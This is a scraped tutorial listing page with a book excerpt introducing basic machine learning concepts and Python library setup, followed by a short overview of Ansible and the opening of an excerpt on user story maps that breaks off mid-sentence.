How-To Tutorials

article-image-getting-started-python-and-machine-learning

23 Jun 2017

34 min read

Getting Started with Python and Machine Learning

23 Jun 2017

In this article by Ivan Idris, Yuxi (Hayden) Liu, and Shoahoa Zhang author of the book Python Machine Learning By Example we cover basic machine learning concepts. If you need more information, then your local library, the Internet, and Wikipedia in particular should help you further. The topics that will be covered in this article are as follows: (For more resources related to this topic, see here.) What is machine learning and why do we need it? A very high level overview of machine learning Generalizing with data Overfitting and the bias variance trade off Dimensions and features Preprocessing, exploration, and feature engineering Combining models Installing software and setting up Troubleshooting and asking for help What is machine learning and why do we need it? Machine learning is a term coined around 1960 composed of two words – machine corresponding to a computer, robot, or other device, and learning an activity, which most humans are good at. So we want machines to learn, but why not leave learning to the humans? It turns out that there are many problems involving huge datasets, for instance, where it makes sense to let computers do all the work. In general, of course, computers and robots don't get tired, don't have to sleep, and may be cheaper. There is also an emerging school of thought called active learning or human-in-the-loop, which advocates combining the efforts of machine learners and humans. The idea is that there are routine boring tasks more suitable for computers, and creative tasks more suitable for humans. According to this philosophy machines are able to learn, but not everything. Machine learning doesn't involve the traditional type of programming that uses business rules. A popular myth says that the majority of the code in the world has to do with simple rules possibly programmed in Cobol, which covers the bulk of all the possible scenarios of client interactions. So why can't we just hire many coders and continue programming new rules? One reason is the cost of defining and maintaining rules becomes very expensive over time. A lot of the rules involve matching strings or numbers, and change frequently. It's much easier and more efficient to let computers figure out everything themselves from data. Also the amount of data is increasing, and actually the rate of growth is itself accelerating. Nowadays the floods of textual, audio, image, and video data are hard to fathom. The Internet of Things is a recent development of a new kind of Internet, which interconnects everyday devices. The Internet of Things will bring data from household appliances and autonomous cars to the forefront. The average company these days has mostly human clients, but for instance social media companies tend to have many bot accounts. This trend is likely to continue and we will have more machines talking to each other. An application of machine learning that you may be familiar is the spam filter, which filters e-mails considered to be spam. Another is online advertising where ads are served automatically based on information advertisers have collected about us. Yet another application of machine learning is search engines. Search engines extract information about web pages, so that you can efficiently search the Web. Many online shops and retail companies have recommender engines, which recommend products and services using machine learning. The list of applications is very long and also includes fraud detection, medical diagnosis, sentiment analysis, and financial market analysis. In the 1983, War Games movie a computer made life and death decisions, which could have resulted in Word War III. As far as I know technology wasn't able to pull off such feats at the time. However, in 1997 the Deep Blue supercomputer did manage to beat a world chess champion. In 2005, a Stanford self-driving car drove by itself for more than 130 kilometers in a desert. In 2007, the car of another team drove through regular traffic for more than 50 kilometers. In 2011, the Watson computer won a quiz against human opponents. In 2016 the AlphaGo program beat one of the best Go players in the world. If we assume that computer hardware is the limiting factor, then we can try to extrapolate into the future. Ray Kurzweil did just that and according to him, we can expect human level intelligence around 2029. A very high level overview of machine learning Machine learning is a subfield of artificial intelligence—a field of computer science concerned with creating systems, which mimic human intelligence. Software engineering is another field of computer science, and we can label Python programming as a type of software engineering. Machine learning is also closely related to linear algebra, probability theory, statistics, and mathematical optimization. We use optimization and statistics to find the best models, which explain our data. If you are not feeling confident about your mathematical knowledge, you probably are wondering, how much time you should spend learning or brushing up. Fortunately to get machine learning to work for you, most of the time you can ignore the mathematical details as they are implemented by reliable Python libraries. You do need to be able to program. As far as I know if you want to study machine learning, you can enroll into computer science, artificial intelligence, and more recently, data science masters. There are various data science bootcamps; however, the selection for those is stricter and the course duration is often just a couple of months. You can also opt for the free massively online courses available on the Internet. Machine learning is not only a skill, but also a bit of sport. You can compete in several machine learning competitions; sometimes for decent cash prizes. However, to win these competitions, you may need to utilize techniques, which are only useful in the context of competitions and not in the context of trying to solve a business problem. A machine learning system requires inputs—this can be numerical, textual, visual, or audiovisual data. The system usually has outputs, for instance, a floating point number, an integer representing a category (also called a class), or the acceleration of a self-driving car. We need to define (or have it defined for us by an algorithm) an evaluation function called loss or cost function, which tells us how well we are learning. In this setup, we create an optimization problem for us with the goal of learning in the most efficient way. For instance, if we fit data to a line also called linear regression, the goal is to have our line be as close as possible to the data points on average. We can have unlabeled data, which we want to group or explore – this is called unsupervised learning. Unsupervised learning can be used to detect anomalies, such as fraud or defective equipment. We can also have labeled examples to use for training—this is called supervised learning. The labels are usually provided by human experts, but if the problem is not too hard, they also may be produced by any members of the public through crowd sourcing for instance. Supervised learning is very common and we can further subdivide it in regression and classification. Regression trains on continuous target variables, while classification attempts to find the appropriate class label. If not all examples are labeled, but still some are we have semi supervised learning. A chess playing program usually applies reinforcement learning—this is a type of learning where the program evaluates its own performance by, for instance playing against itself or earlier versions of itself. We can roughly categorize machine learning algorithms in logic-based learning, statistical learning, artificial neural networks, and genetic algorithms. In fact, we have a whole zoo of algorithms with popularity varying over time. The logic-based systems were the first to be dominant. They used basic rules specified by human experts, and with these rules systems tried to reason using formal logic. In the mid-1980s, artificial neural networks came to the foreground, to be then pushed aside by statistical learning systems in the 1990s. Artificial neural networks imitate animal brains, and consist of interconnected neurons that are also an imitation of biological neurons. Genetic algorithms were pretty popular in the 1990s (or at least that was my impression). Genetic algorithms mimic the biological process of evolution. We are currently (2016) seeing a revolution in deep learning, which we may consider to be a rebranding of neural networks. The term deep learning was coined around 2006, and it refers to deep neural networks with many layers. The breakthrough in deep learning is amongst others caused by the availability of graphics processing units (GPU), which speed up computation considerably. GPUs were originally intended to render video games, and are very good in parallel matrix and vector algebra. It is believed that deep learning resembles, the way humans learn, therefore it may be able to deliver on the promise of sentient machines. You may have heard of Moore's law—an empirical law, which claims that computer hardware improves exponentially with time. The law was first formulated by Gordon Moore, the co-founder of Intel, in 1965. According to the law the number of transistors on a chip should double every two years. In the following graph, you can see that the law holds up nicely (the size of the bubbles corresponds to the average transistor count in GPUs): The consensus seems to be that Moore's law should continue to be valid for a couple of decades. This gives some credibility to Ray Kurzweil's predictions of achieving true machine intelligence in 2029. We will encounter many of the types of machine learning later in this book. Most of the content is about supervised learning with some examples of unsupervised learning. The popular Python libraries support all these types of learning. Generalizing with data The good thing about data is that we have a lot of data in the world. The bad thing is that it is hard to process this data. The challenges stem from the diversity and noisiness of the data. We as humans, usually process data coming in our ears and eyes. These inputs are transformed into electrical or chemical signals. On a very basic level computers and robots also work with electrical signals. These electrical signals are then translated into ones and zeroes. However, we program in Python in this book, and on that level normally we represent the data either as numbers, images, or text. Actually images and text are not very convenient, so we need to transform images and text into numerical values. Especially in the context of supervised learning we have a scenario similar to studying for an exam. We have a set of practice questions and the actual exam. We should be able to answer exam questions without knowing the answers for them. This is called generalization – we learn something from our practice questions and hopefully are able to apply this knowledge to other similar questions. Finding good representative examples is not always an easy task depending on the complexity of the problem we are trying to solve and how generic the solution needs to be. An old-fashioned programmer would talk to a business analyst or other expert, and then implement a rule that adds a certain value multiplied by another value corresponding for instance to tax rules. In a machine learning setup we can give the computer example input values and example output values. Or if we are more ambitious, we can feed the program the actual tax texts and let the machine process the data further just like an autonomous car doesn't need a lot of human input. This means implicitly that there is some function, for instance, a tax formula that we are trying to find. In physics we have almost the same situation. We want to know how the universe works, and formulate laws in a mathematical language. Since we don't know the actual function all we can do is measure what our error is, and try to minimize it. In supervised learning we compare our results against the expected values. In unsupervised learning we measure our success with related metrics. For instance, we want clusters of data to be well defined. In reinforcement learning a program evaluates its moves, for example, in a chess game using some predefined function. Overfitting and the bias variance trade off Overfitting, (one word) is such an important concept, that I decided to start discussing it very early in this book. If you go through many practice questions for an exam, you may start to find ways to answer questions, which have nothing to do with the subject material. For instance, you may find that if you have the word potato in the question, the answer is A, even if the subject has nothing to do with potatoes. Or even worse, you may memorize the answers for each question verbatim. We can then score high on the practice questions, which are called the train set in machine learning. However, we will score very low on the exam questions, which are called the test set in machine learning. This phenomenon of memorization is called bias. Overfitting almost always means that we are trying too hard to extract information from the data (random quirks), and using more training data will not help. The opposite scenario is called underfitting. When we underfit we don't have a very good result on the train set, but also not a very good result on the test set. Underfitting may indicate that we are not using enough data, or that we should try harder to do something useful with the data. Obviously we want to avoid both scenarios. Machine learning errors are the sum of bias and variance. Variance measures how much the error varies. Imagine that we are trying to decide what to wear based on the weather outside. If you have grown up in a country with a tropical climate, you may be biased towards always wearing summer clothes. If you lived in a cold country, you may decide to go to a beach in Bali wearing winter clothes. Both decisions have high bias. You may also just wear random clothes that are not appropriate for the weather outside – this is an outcome with high variance. It turns out that when we try to minimize bias or variance, we tend to increase the other – a concept known as the bias variance tradeoff. The expected error is given by the following equation: The last term is the irreducible error. Cross-validation Cross-validation is a technique, which helps to avoid overfitting. Just like we would have a separation of practice questions and exam questions, we also have training sets and test sets. It's important to keep the data separated and only use the test set in the final stage. There are many cross-validation schemes in use. The most basic setup splits the data given a specified percentage – for instance 75 % train data and 25 % test set. We can also leave out a fixed number of observations in multiple rounds, so that these items are in the test set, and the rest of the data is in the train set. For instance, we can apply leave-one-outcross-validation (LOOCV) and let each datum be in the test set once. For a large dataset LOOCV requires as many rounds as there are data items, and can therefore be too slow. The k-fold cross-validation performs better than LOOCV and randomly splits the data into k (a positive integer) folds. One of the folds becomes the test set, and the rest of the data becomes the train set. We repeat this process k times with each fold being the designated test set once. Finally, we average the k train and test errors for the purpose of evaluation. Common values for k are five and ten. The following table illustrates the setup for five folds: Iteration Fold 1 Fold 2 Fold 3 Fold 4 Fold 5 1 Test Train Train Train Train 2 Train Test Train Train Train 3 Train Train Test Train Train 4 Train Train Train Test Train 5 Train Train Train Train Test We can also randomly split the data into train and test set multiple times. The problem with this algorithm is that some items may never end in the test set, while others may be selected in the test set multiple times. The nested cross-validation is a combination of cross-validations. Nested cross-validation consists of the following cross-validations: The inner cross-validation does optimization to find the best fit, and can be implemented as k-fold cross validation. The outer cross-validation is used to evaluate performance and do statistical analysis. Regularization Regularization like cross-validation is a general technique to fight overfitting. Regularization adds extra parameters to the error function we are trying to minimize, in order to penalize complex models. For instance, if we are trying to fit a curve to a high order polynomial, we may use regularization to reduce the influence of the higher degrees, thereby effectively reducing the order of the polynomial. Simpler methods are to be preferred, at least according to the principle of Occam's razor. William Occam was a monk and philosopher who around 1320 came up with the idea that the simplest hypothesis that fits data should be preferred. One justification is that you can invent fewer simple models than complex models. For instance, intuitively we know that there are more higher polynomial models than linear ones. The reason is that a line (f(x) = ax + b) is governed by only two numbers – the intercept b and slope a. The possible coefficients for a line span two-dimensional space. A quadratic polynomial adds an extra coefficient for the quadratic term, and we can span a three-dimensional space with the coefficients. Therefore it is less likely that we find a linear model than more complex models, because the search space for linear models is much smaller (although it is infinite). And of course simpler models are just easier to use and require less computation time. We can also stop a program early as a form of regularization. If we give a machine learner less time it is more likely to produce a simpler model, and we hope less likely to overfit. Of course, we have to do this in an ordered fashion, so this means that the algorithm should be aware of the possibility of early termination. Dimensions and features We typically represent the data as a grid of numbers (a matrix). Each column represents a variable, which we call a feature in machine learning. In supervised learning one of the variables is actually not a feature, but the label that we are trying to predict. And in supervised learning each row is an example that we can use for training or testing. The number of features corresponds to the dimensionality of the data. Our machine learning approach depends on the number of dimensions versus the number of examples. For instance, text and image data are very high dimensional, while stock market data has relatively fewer dimensions. Fitting high dimensional data is computationally expensive, and is also prone to overfitting due to the high complexity. Higher dimensions are also impossible to visualize, and therefore we can't use simple diagnostic methods. Not all the features are useful and they may only add randomness to our results. It is therefore often important to do good feature selection. Feature selection is a form of dimensionality reduction. Some machine learning algorithms are actually able to automatically perform feature selection. We should be careful not to omit features that do contain information. Some practitioners evaluate the correlation of a single feature and the target variable. In my opinion you shouldn't do that, because correlation of one variable with the target in itself doesn't tell you much, instead use an off-the-shelf algorithm and evaluate the results of different feature subsets. In principle, feature selection boils down to multiple binary decisions whether to include a feature or not. For n features we get 2n feature sets, which can be a very large number for a large number of features. For example, for 10 features we have 1024 possible feature sets (for instance if we are deciding what clothes to wear the features can be temperature, rain, the weather forecast, where we are going, and so on). At a certain point brute force evaluation becomes infeasible. We will discuss better methods in this book. Basically we have two options: we either start with all the features, and remove features iteratively or we start with a minimum set of features and add features iteratively. We then take the best feature sets for each iteration, and then compare them. Another common dimensionality reduction approach is to transform high-dimensional data in lower-dimensional space. This transformation leads to information loss, but we can keep the loss to a minimum. We will cover this in more detail later on. Preprocessing, exploration, and feature engineering Data mining, a buzzword in the 1990 is the predecessor of data science (the science of data). One of the methodologies popular in the data mining community is called cross industry standard process for data mining (CRISP DM). CRISP DM was created in 1996, and is still used today. I am not endorsing CRISP DM, however I like its general framework. The CRISP DM consists of the following phases, which are not mutually exclusive and can occur in parallel: Business understanding: This phase is often taken care of by specialized domain experts. Usually we have a business person formulate a business problem, such as selling more units of a certain product. Data understanding: This is also a phase, which may require input from domain experts, however, often a technical specialist needs to get involved more than in the business understanding phase. The domain expert may be proficient with spreadsheet programs, but have trouble with complicated data. In this book I usually call this phase exploration. Data preparation: This is also a phase where a domain expert with only Excel knowhow may not be able to help you. This is the phase where we create our training and test datasets. In this book I usually call this phase preprocessing. Modeling: This is the phase, which most people associate with machine learning. In this phase we formulate a model, and fit our data. Evaluation: In this phase, we evaluate our model, and our data to check whether we were able to solve our business problem. Deployment: This phase usually involves setting up the system in a production environment (it is considered good practice to have a separate production system). Typically this is done a specialized team. When we learn, we require high quality learning material. We can't learn from gibberish, so we automatically ignore anything that doesn't make sense. A machine learning system isn't able to recognize gibberish, so we need to help it by cleaning the input data. It is often claimed that cleaning the data forms a large part of machine learning. Sometimes cleaning is already done for us, but you shouldn't count on it. To decide how to clean the data, we need to be familiar with the data. There are some projects, which try to automatically explore the data, and do something intelligent, like producing a report. For now unfortunately we don't have a solid solution, so you need to do some manual work. We can do two things, which are not mutually exclusive – first scan the data and second visualizing the data. This also depends on the type of data we are dealing with whether we have a grid of numbers, images, audio, text, or something else. At the end, a grid of numbers is the most convenient form, and we will always work towards having numerical features. We want to know if features miss values, how the values are distributed and what type of features we have. Values can approximately follow a Normal distribution, a Binomial distribution, a Poisson distribution or another distribution altogether. Features can be binary – either yes or no, positive or negative, and so on. They can also be categorical – pertaining to a category, for instance continents (Africa, Asia, Europe, Latin America, North America, and so on).Categorical variables can also be ordered – for instance high, medium, and low. Features can also be quantitative – for example temperature in degrees or price in dollars. Feature engineering is the process of creating or improving features. It's more of a dark art than a science. Features are often created based on common sense, domain knowledge or prior experience. There are certain common techniques for feature creation, however there is no guarantee that creating new features will improve your results. We are sometimes able to use the clusters found by unsupervised learning as extra features. Deep neural networks are often able to create features automatically. Missing values Quite often we miss values for certain features. This could happen for various reasons. It can be inconvenient, expensive or even impossible to always have a value. Maybe we were not able to measure a certain quantity in the past, because we didn't have the right equipment, or we just didn't know that the feature is relevant. However, we are stuck with missing values from the past. Sometimes it's easy to figure out that we miss values and we can discover this just by scanning the data, or counting the number of values we have for a feature and comparing to the number of values we expect based on the number of rows. Certain systems encode missing values with for example values as 999999. This makes sense if the valid values are much smaller than 999999. If you are lucky you will have information about the features provided by whoever created the data in the form of a data dictionary or metadata. Once we know that we miss values the question arises of how to deal with them. The simplest answer is to just ignore them. However, some algorithms can't deal with missing values, and the program will just refuse to continue. In other circumstances ignoring missing values will lead to inaccurate results. The second solution is to substitute missing values by a fixed value – this is called imputing. We can impute the arithmetic mean, median or mode of the valid values of a certain feature. Ideally, we will have a relation between features or within a variable that is somewhat reliable. For instance, we may know the seasonal averages of temperature for a certain location and be able to impute guesses for missing temperature values given a date. Label encoding Humans are able to deal with various types of values. Machine learning algorithms with some exceptions need numerical values. If we offer a string such as Ivan unless we are using specialized software the program will not know what to do. In this example we are dealing with a categorical feature – names probably. We can consider each unique value to be a label. (In this particular example we also need to decide what to do with the case – is Ivan the same as ivan). We can then replace each label by an integer – label encoding. This approach can be problematic, because the learner may conclude that there is an ordering. One hot encoding The one-of-K or one-hot-encoding scheme uses dummy variables to encode categorical features. Originally it was applied to digital circuits. The dummy variables have binary values like bits, so they take the values zero or one (equivalent to true or false). For instance, if we want to encode continents we will have dummy variables, such as is_asia, which will be true if the continent is Asia and false otherwise. In general, we need as many dummy variables, as there are unique labels minus one. We can determine one of the labels automatically from the dummy variables, because the dummy variables are exclusive. If the dummy variables all have a false value, then the correct label is the label for which we don't have a dummy variable. The following table illustrates the encoding for continents: Is_africa Is_asia Is_europe Is_south_america Is_north_america Africa True False False False False Asia False True False False False Europe False False True False False South America False False False True False North America False False False False True Other False False False False False The encoding produces a matrix (grid of numbers) with lots of zeroes (false values) and occasional ones (true values). This type of matrix is called a sparse matrix. The sparse matrix representation is handled well by the SciPy package, and shouldn't be an issue. We will discuss the SciPy package later in this article. Scaling Values of different features can differ by orders of magnitude. Sometimes this may mean that the larger values dominate the smaller values. This depends on the algorithm we are using. For certain algorithms to work properly we are required to scale the data. There are several common strategies that we can apply: Standardization removes the mean of a feature and divides by the standard deviation. If the feature values are normally distributed, we will get a Gaussian, which is centered around zero with a variance of one. If the feature values are not normally distributed, we can remove the median and divide by the interquartile range. The interquartile range is a range between the first and third quartile (or 25th and 75th percentile). Scaling features to a range is a common choice of range which is a range between zero and one. Polynomial features If we have two features a and b, we can suspect that there is a polynomial relation, such as a2 + ab + b2. We can consider each term in the sum to be a feature – in this example we have three features. The product ab in the middle is called an interaction. An interaction doesn't have to be a product, although this is the most common choice, it can also be a sum, a difference or a ratio. If we are using a ratio to avoid dividing by zero, we should add a small constant to the divisor and dividend. The number of features and the order of the polynomial for a polynomial relation are not limited. However, if we follow Occam's razor we should avoid higher order polynomials and interactions of many features. In practice, complex polynomial relations tend to be more difficult to compute and not add much value, but if you really need better results they may be worth considering. Power transformations Power transforms are functions that we can use to transform numerical features into a more convenient form, for instance to conform better to a normal distribution. A very common transform for values, which vary by orders of magnitude, is to take the logarithm. Taking the logarithm of a zero and negative values is not defined, so we may need to add a constant to all the values of the related feature before taking the logarithm. We can also take the square root for positive values, square the values or compute any other power we like. Another useful transform is the Box-Cox transform named after its creators. The Box-Cox transform attempts to find the best power need to transform the original data into data that is closer to the normal distribution. The transform is defined as follows: Binning Sometimes it's useful to separate feature values into several bins. For example, we may be only interested whether it rained on a particular day. Given the precipitation values we can binarize the values, so that we get a true value if the precipitation value is not zero, and a false value otherwise. We can also use statistics to divide values into high, low, and medium bins. The binning process inevitably leads to loss of information. However, depending on your goals this may not be an issue, and actually reduce the chance of overfitting. Certainly there will be improvements in speed and memory or storage requirements. Combining models In (high) school we sit together with other students, and learn together, but we are not supposed to work together during the exam. The reason is, of course, that teachers want to know what we have learned, and if we just copy exam answers from friends, we may have not learned anything. Later in life we discover that teamwork is important. For example, this book is the product of a whole team, or possibly a group of teams. Clearly a team can produce better results than a single person. However, this goes against Occam's razor, since a single person can come up with simpler theories compared to what a team will produce. In machine learning we nevertheless prefer to have our models cooperate with the following schemes: Bagging Boosting Stacking Blending Voting and averaging Bagging Bootstrap aggregating or bagging is an algorithm introduced by Leo Breiman in 1994, which applies bootstrapping to machine learning problems. Bootstrapping is a statistical procedure, which creates datasets from existing data by sampling with replacement. Bootstrapping can be used to analyze the possible values that arithmetic mean, variance or other quantity can assume. The algorithm aims to reduce the chance of overfitting with the following steps: We generate new training sets from input train data by sampling with replacement. Fit models to each generated training set. Combine the results of the models by averaging or majority voting. Boosting In the context of supervised learning we define weak learners as learners that are just a little better than a baseline such as randomly assigning classes or average values. Although weak learners are weak individually like ants, together they can do amazing things just like ants can. It makes sense to take into account the strength of each individual learner using weights. This general idea is called boosting. There are many boosting algorithms; boosting algorithms differ mostly in their weighting scheme. If you have studied for an exam, you may have applied a similar technique by identifying the type of practice questions you had trouble with and focusing on the hard problems. Face detection in images is based on a specialized framework, which also uses boosting. Detecting faces in images or videos is a supervised learning. We give the learner examples of regions containing faces. There is an imbalance, since we usually have far more regions (about ten thousand times more) that don't have faces. A cascade of classifiers progressively filters out negative image areas stage by stage. In each progressive stage the classifiers use progressively more features on fewer image windows. The idea is to spend the most time on image patches, which contain faces. In this context boosting is used to select features and combine results. Stacking Stacking takes the outputs of machine learning estimators and then uses those as inputs for another algorithm. You can, of course, feed the output of the higher-level algorithm to another predictor. It is possible to use any arbitrary topology, but for practical reasons you should try a simple setup first as also dictated by Occam's razor. Blending Blending was introduced by the winners of the one million dollar Netflix prize. Netflix organized a contest with the challenge of finding the best model to recommend movies to their users. Netflix users can rate a movie with a rating of one to five stars. Obviously each user wasn't able to rate each movie, so the user movie matrix is sparse. Netflix published an anonymized training and test set. Later researchers found a way to correlate the Netflix data to IMDB data. For privacy reasons the Netflix data is no longer available. The competition was won in 2008 by a group of teams combining their models. Blending is a form of stacking. The final estimator in blending however trains only on a small portion of the train data. Voting and averaging We can arrive at our final answer through majority voting or averaging. It's also possible to assign different weights to each model in the ensemble. For averaging we can also use the geometric mean or the harmonic mean instead of the arithmetic mean. Usually combining the results of models, which are highly correlated to each other doesn't lead to spectacular improvements. It's better to somehow diversify the models, by using different features or different algorithms. If we find that two models are strongly correlated, we may for example decide to remove one of them from the ensemble, and increase proportionally the weight of the other model. Installing software and setting up For most projects in this book we need scikit-learn (Refer, http://scikit-learn.org/stable/install.html) and matplotlib (Refer, http://matplotlib.org/users/installing.html). Both packages require NumPy, but we also need SciPy for sparse matrices as mentioned before. The scikit-learn library is a machine learning package, which is optimized for performance as a lot of the code runs almost as fast as equivalent C code. The same statement is true for NumPy and SciPy. There are various ways to speed up the code, however they are out of scope for this book, so if you want to know more, please consult the documentation. Matplotlib is a plotting and visualization package. We can also use the seaborn package for visualization. Seaborn uses matplotlib under the hood. There are several other Python visualization packages that cover different usage scenarios. Matplotlib and seaborn are mostly useful for the visualization for small to medium datasets. The NumPy package offers the ndarray class and various useful array functions. The ndarray class is an array, that can be one or multi-dimensional. This class also has several subclasses representing matrices, masked arrays, and heterogeneous record arrays. In machine learning we mainly use NumPy arrays to store feature vectors or matrices composed of feature vectors. SciPy uses NumPy arrays and offers a variety of scientific and mathematical functions. We also require the pandas library for data wrangling. In this book we will use Python 3. As you may know Python 2 will no longer be supported after 2020, so I strongly recommend switching to Python 3. If you are stuck with Python 2 you still should be able to modify the example code to work for you. In my opinion the Anaconda Python 3 distribution is the best option. Anaconda is a free Python distribution for data analysis and scientific computing. It has its own package manager conda. The distribution includes more than 200 Python packages, which makes it very convenient. For casual users the Miniconda distribution may be the better choice. Miniconda contains the conda package manager and Python. The procedures to install Anaconda and Miniconda are similar. Obviously, Anaconda takes more disk space. Follow the instructions from the Anaconda website at http://conda.pydata.org/docs/install/quick.html. First, you have to download the appropriate installer for your operating system and Python version. Sometimes you can choose between a GUI and a command line installer. I used the Python 3 installer, although my system Python version is 2.7. This is possible since Anaconda comes with its own Python. On my machine the Anaconda installer created an anaconda directory in my home directory and required about 900 MB. The Miniconda installer installs a miniconda directory in your home directory. Installation instructions for NumPy are at http://docs.scipy.org/doc/numpy/user/install.html. Alternatively install NumPy with pip as follows: $ [sudo] pip install numpy The command for Anaconda users is: $ conda install numpy To install the other dependencies substitute NumPy by the appropriate package. Please read the documentation carefully, not all options work equally well for each operating system. The pandas installation documentation is at http://pandas.pydata.org/pandas-docs/dev/install.html. Troubleshooting and asking for help Currently the best forum is at http://stackoverflow.com. You can also reach out on mailing lists or IRC chat. The following is a list of mailing lists: Scikit-learn: https://lists.sourceforge.net/lists/listinfo/scikit-learn-general. NumPy and Scipy mailing list: https://www.scipy.org/scipylib/mailing-lists.html. IRC channels: #scikit-learn @ freenode #scipy @ freenode Summary In this article we covered the basic concepts of machine learning, a high level overview, generalizing with data, overfitting, dimensions and features, preprocessing, combining models, installing the required software and some places where you can ask for help. Resources for Article: Further resources on this subject: Machine learning and Python – the Dream Team Machine Learning in IPython with scikit-learn How to do Machine Learning with Python

0
0
15163

Packt

23 Jun 2017

20 min read

To Optimize Scans

Packt

23 Jun 2017

20 min read

0
0
37401

How-To Tutorials

Packt

23 Jun 2017

5 min read

Getting Started with Ansible 2

Packt

23 Jun 2017

5 min read

In this article, by Jonathan McAllister, author of the book, Implementing DevOps with Ansible 2, we will learn what is Ansible, how users can leverage it, it's architecture, the key differentiators of Ansible from other configuration managements. We will also see the organizations that were successfully able to leverage Ansible. (For more resources related to this topic, see here.) What is Ansible? Ansible is a relatively new addition to the DevOps and configuration management space. It's simplicity, structured automation format and development paradigm have caught the eyes of both small and large corporations alike. Organizations as large as Twitter have managed successfully to leverage Ansible for highly scaled deployments and configuration management across implementations across thousands of servers simultaneously. And Twitter isn't the only organization that has managed to implement Ansible at scale, other well-known organizations that have successfully leveraged Ansible include Logitech, NASA, NEC, Twitter, Microsoft and hundreds more. As it stands today, Ansible is in use by major players around the world managing thousands of deployments and configuration management solutions world wide. The Ansible's Automation Architecture Ansible was created with an incredibly flexible and scalable automation engine. It allows users to leverage it in many diverse ways and can be conformed to be used in the way that best suits your specific needs. Since Ansible is agentless (meaning there is no permanently running daemon on the systems it manages or executes from), it can be used locally to control a single system (without any network connectivity), or leveraged to orchestrate and execute automation against many systems, via a control server. In addition to the aforementioned named architectures, Ansible can also be leveraged via Vagrant or Docker to provision infrastructure automatically. This type of solution basically allows the Ansible user to bootstrap their hardware or infrastructure provisioning by running an Ansible playbook(s). If you happen to be a Vagrant user, there is instructions within the HashiCorp Ansible provisioning located at https://www.vagrantup.com/docs/provisioning/ansible.html. Ansible is open source, module based, pluggable, and agentless. These key differentiators from other configuration management solutions give Ansible a significant edge. Let's take a look at each of these differentiators in details and see what that actually means for Ansible developers and users: Open source: It is no secret that successful open source solutions are usually extraordinarily feature rich. This is because instead of a simple 8 person (or even 100) person engineering team, there are potentially thousands of developers. Each development and enhancement has been designed to fit a unique need. As a result the end deliverable product provides the consumers of Ansible with a very well rounded solution that can be adapted or leveraged in numerous ways. Module based: Ansible has been developed with the intention to integrate with numerous other open and closed source software solutions. This idea means that Ansible is currently compatible with multiple flavors of Linux, Windows and Cloud providers. Aside from its OS level support Ansible currently integrates with hundreds of other software solutions; including EC2, Jira, Jenkins, Bamboo, Microsoft Azure, Digital Ocean, Docker, Google and MANY MANY more. For a complete list of Ansible modules, please consult the Ansible official module support list located at http://docs.ansible.com/ansible/modules_by_category.html. Agentless: One of the key differentiators that gives Ansible an edge against the competition is the fact that it is 100% agentless. This means there are no daemons that need to be installed on remote machines, no firewall ports that need to be opened (besides traditional SSH), no monitoring that needs to be performed on the remote machines and no management that needs to be performed on the infrastructure fleet. In effect, this makes Ansible very self sufficient. Since Ansible can be implemented in a few different ways the aim of this section is to highlight these options and help get us familiar with the architecture types that Ansible supports. Generally the architecture of Ansible can be categorized into three distinct architecture types. These are described next. Pluggable: While Ansible comes out of the box with a wide spectrum of software integrations support, it is often times a requirement to integrate the solution with a company based internal software solution or a software solution that has not already been integrated into Ansible's robust playbook suite. The answer to such a requirement would be to create a plugin based solution for Ansible, this providing the custom functionality necessary. Summary In this article, we discussed the architecture of Ansible, the key differentiators that differentiate Ansible from other configuration management. We learnt that Ansible can also be leveraged via Vagrant or Docker to provision infrastructure automatically. We also saw that Ansible has been successfully leveraged by large oraganizations like Twitter, Microsoft, and many more. Resources for Article: Further resources on this subject: Getting Started with Ansible Getting Started with Ansible Introduction to Ansible Introduction to Ansible System Architecture and Design of Ansible System Architecture and Design of Ansible

0
0
25509

Packt

23 Jun 2017

17 min read

Exploring Compilers

Packt

23 Jun 2017

17 min read

0
0
12993

Packt

23 Jun 2017

18 min read

User Story Map – The First User Experience Map in a Product’s Life

Packt

23 Jun 2017

18 min read

In this article by Peter W. Szabo, the author of the book User Experience Mapping we will explore the idea of how to start with predictive analysis. In this User story maps solve the user's problems in form of a discussion. Your job as a product manager or user experience consultant should be to make the world better through user-centric products. Essentially solving the user's problems. Contrary to popular belief, user story maps are not just cash cows for agile experts. They will help a product to succeed, by increasing their understanding of the system. Not just what's inside it, but what will happen to the world as a result. By focusing on the opportunity and outcomes the team can prioritize development. In reality, this often means stopping the proliferation of features, andunderdoing your competition. Wait a minute, did you just read underdoing? As in, fewer features, not making bold promises and significantly less customizability and options? Yes indeed. The founders of Basecamp (formerly 37 signals) are the champions of building less. In their bookReWork: Change the Way You Work Foreverthey tell Basecamp's success story while giving vital advice to anyone trying to run a build a product or a startup: “When things aren't working, the natural inclination is to throw more at the problem. More people, time, and money. All that ends up doing is making the problem bigger. The right way to go is the opposite direction: Cut back. So do less. Your project won't suffer nearly as much as you fear. In fact, there's a good chance it'll end up even better.” (Jason Fried) User Story Maps will help you to throw less at the problem, chopping down extras, until you reach an awesome product, which is actually done.One of the problems with long product backlogs or nightmarish requirement documents is that it never gets done. Literally never. Once I had to work on improving the user experience of a bank's backend. It was a gargantuan task, as this backend was a large collection of distributed microservices, which meant hundreds of different forms with hard to understand functions and a badly designed multi-level menu which connected them together. I knew almost nothing about banking, and they knew almost nothing about UX, so this was a match made in heaven. They gave me a twelve-page document. That was just the non-disclosure agreement. The project had many 100+ page documents, detailing various things and how they are done, complete with business processes and banking jargon. They wanted us to compile an expert review on what needs to be redesigned and create a detailed strategy for that. I found a better use of their money than wasting time on expert reviews and redesign strategies at that stage. Recording or even watching bank employees, while they used the system during their work was out of the question. So we went for the quick win and did user story mapping in the first week of the project. Among the attendees of the user story mapping sessions, therewerea few non-manager level bank employees, who used the backend extensively. One of them was quite new to her job, but fortunately, quite talkative about it. It was immediately evident that most employees almost never used at least 95% of the functionality. Those were reserved for specially trained people, usually managers. After creating the user story map with the most essential and frequently used features, I suggested a backend interface, which only contained about 1% of the functionality of the old system at first, with the mention of other features to be added later. (As a UX consultant you should avoid saying no, instead try saying later. It has the same effect for the project but keeps everyone happy.) No one in the room believed that such a crazy idea would go through senior management, although they supported the proposal. Quite the contrary, it did go extremely well with senior management. The senior managers understood, that by creating a simple and fast backend user interface, they will be able to reduce the queues without hiring new employees. Moreover, if they need to hire people, training will be easier and faster. The new UI could also reduce the number of human errors. Almost all of the old backend was still online two years later, although used only by a few employees. This made both the product and the information security team happy, not to mention HR. The functionality of the new application extended only slightly in 24 months. Nobody complained and the bank's customers were happy with smaller queues. All this was achieved with a pack of colored sticky notes, some markers and much more importantly a discussion and shared understanding. This is just one example, how a 